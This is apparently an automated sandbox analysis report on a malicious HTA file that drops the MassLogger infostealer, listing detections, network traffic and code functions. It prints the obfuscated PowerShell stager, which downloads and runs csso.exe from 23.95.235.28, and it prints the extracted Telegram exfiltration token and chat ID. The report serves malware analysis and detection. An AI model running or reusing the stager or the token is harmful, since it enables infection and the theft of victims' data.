ICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))", CommandLine: POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICA

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lphx2jer\lphx2jer.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lphx2jer\lphx2jer.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6860, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lphx2jer\lphx2jer.cmdline", ProcessId: 1792, ProcessName: csc.exe

Suricata Signatures

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T09:27:12.994866+0100	2022050	1	A Network Trojan was detected	23.95.235.28	80	192.168.2.6	49693	TCP

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T09:27:13.171125+0100	2022051	1	A Network Trojan was detected	23.95.235.28	80	192.168.2.6	49693	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T09:27:21.391083+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49695	193.122.130.0	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000D.00000002.2442267821.0000000003301000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}

Multi AV Scanner detection for submitted file

Source: efs.hta	Virustotal: Detection: 37%			Perma Link
Source: efs.hta	ReversingLabs: Detection: 23%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49696 version: TLS 1.0

Source:	Binary string: q:C:\Users\user\AppData\Local\Temp\lphx2jer\lphx2jer.pdb source: powershell.exe, 00000003.00000002.1335820890.0000000005827000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: csso.exe, 0000000C.00000003.1316217538.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, csso.exe, 0000000C.00000003.1316367694.0000000003E70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: csso.exe, 0000000C.00000003.1316217538.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, csso.exe, 0000000C.00000003.1316367694.0000000003E70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \\?\C:\Windows\system32\TenantRestrictionsPlugin.dllx2jer.pdbBm source: powershell.exe, 00000003.00000002.1339660920.0000000007C7A000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000C445A GetFileAttributesW,FindFirstFileW,FindClose,	12_2_000C445A
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000CC6D1 FindFirstFileW,FindClose,	12_2_000CC6D1
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	12_2_000CC75C
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	12_2_000CEF95
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	12_2_000CF0F2
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	12_2_000CF3F3
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_000C37EF
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_000C3B12
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	12_2_000CBCBC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 012B5769h	13_2_012B54B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 012B6008h	13_2_012B5BEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 012B6008h	13_2_012B5F36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D11935h	13_2_01D115F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1F480h	13_2_01D1F1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1CC30h	13_2_01D1C988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D11449h	13_2_01D111A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1EBD0h	13_2_01D1E928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1C380h	13_2_01D1C0D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D10B99h	13_2_01D108F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D14350h	13_2_01D140A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D102E9h	13_2_01D10040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1E320h	13_2_01D1E078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1BAD0h	13_2_01D1B828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1B678h	13_2_01D1B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D13648h	13_2_01D133A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1ADC8h	13_2_01D1AB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D12D98h	13_2_01D12AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1FD30h	13_2_01D1FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1A518h	13_2_01D1A270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1D4E0h	13_2_01D1D238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1D088h	13_2_01D1CDE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1F028h	13_2_01D1ED80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D10FF1h	13_2_01D10D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1C7D8h	13_2_01D1C530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1E778h	13_2_01D1E4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D10741h	13_2_01D10498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1BF28h	13_2_01D1BC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D13EF8h	13_2_01D13C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1DEC8h	13_2_01D1DC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D13AA0h	13_2_01D137F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D131F0h	13_2_01D12F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1B220h	13_2_01D1AF78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1A970h	13_2_01D1A6C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1D93Ah	13_2_01D1D690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1A0C0h	13_2_01D19E18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01D1F8D8h	13_2_01D1F630

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 23.95.235.28:80 -> 192.168.2.6:49693
Source: Network traffic	Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 23.95.235.28:80 -> 192.168.2.6:49693

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 08:27:12 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 13 Mar 2025 06:17:45 GMTETag: "eb800-6303347ba1aab"Accept-Ranges: bytesContent-Length: 964608Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 81 78 d2 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 d6 05 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 01 80 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 e8 2f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 2f 02 00 00 70 0c 00 00 30 02 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 a0 0e 00 00 72 00 00 00 46 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /xml/ HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 23.95.235.28 23.95.235.28

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49695 -> 193.122.130.0:80

Source: global traffic	HTTP traffic detected: GET /60/csso.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49696 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.28

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_05207E00 URLDownloadToFileW,

3_2_05207E00

Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /60/csso.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: powershell.exe, 00000003.00000002.1335820890.0000000005827000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.28/60/csso.exe
Source: powershell.exe, 00000003.00000002.1339660920.0000000007C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.28/60/csso.exe1
Source: powershell.exe, 00000003.00000002.1339660920.0000000007C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.28/60/csso.exeN
Source: RegSvcs.exe, 0000000D.00000002.2442267821.0000000003380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 0000000D.00000002.2442267821.0000000003380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com0
Source: RegSvcs.exe, 0000000D.00000002.2442267821.0000000003380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: RegSvcs.exe, 0000000D.00000002.2442267821.0000000003380000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2442267821.000000000336E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 0000000D.00000002.2442267821.0000000003301000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 0000000D.00000002.2442267821.0000000003380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: csso.exe, 0000000C.00000002.1321194955.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2438663867.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 0000000D.00000002.2442267821.0000000003380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: powershell.exe, 00000003.00000002.1337786129.0000000006468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1335820890.0000000005557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
